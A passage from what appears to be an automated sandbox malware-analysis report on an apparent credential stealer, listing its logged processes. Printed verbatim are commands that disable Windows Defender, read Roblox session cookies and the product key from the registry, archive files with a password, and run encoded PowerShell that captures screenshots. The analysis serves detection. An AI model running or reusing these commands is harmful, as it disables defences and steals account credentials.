MALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,97_2_00007FF7080DB340
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26895E0 cpuid 4_2_00007FF7C26895E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
